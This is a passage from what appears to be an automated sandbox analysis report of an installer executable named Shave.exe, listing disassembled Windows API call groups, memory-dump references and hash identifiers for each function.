                                                                                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                                                                                  • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Shave.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                  • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                                                                • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shave.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shave.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shave.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: "C:\Users\user\Desktop\Shave.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 589700163-3265401821
                                                                                                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                                                                • GetSysColor.USER32(?), ref: 004042FB
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                                                                • DeleteObject.GDI32(?), ref: 00404325
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                  • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                                                                                • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                • lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                • lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,759223A0), ref: 0040535A
                                                                                                                                • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                                                                • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                                                                • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                                                                • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                                                                                • GetMessagePos.USER32 ref: 00404BEC
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID: Tahoma
                                                                                                                                • API String ID: 3808545654-3580928618
                                                                                                                                • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                                                                • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                • MulDiv.KERNEL32(0008622C,00000064,00086230), ref: 00402E3C
                                                                                                                                • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                Strings
                                                                                                                                • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                                                                • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 6F97121B: GlobalAlloc.KERNEL32(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6F97265B
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F972690
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: ab00b9765c9d7114486d3667bcdec5be846ee35255466de9f6ae06ab9a45a458
                                                                                                                                • Instruction ID: c6126a7ed7ec89913452f409ae227e89680d3162b460e33967fa9e72404ee5c6
                                                                                                                                • Opcode Fuzzy Hash: ab00b9765c9d7114486d3667bcdec5be846ee35255466de9f6ae06ab9a45a458
                                                                                                                                • Instruction Fuzzy Hash: E2318D31918711EFDB348F68C998C2B77BAFB8B318710456BF581872A0DB31E9658F15
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
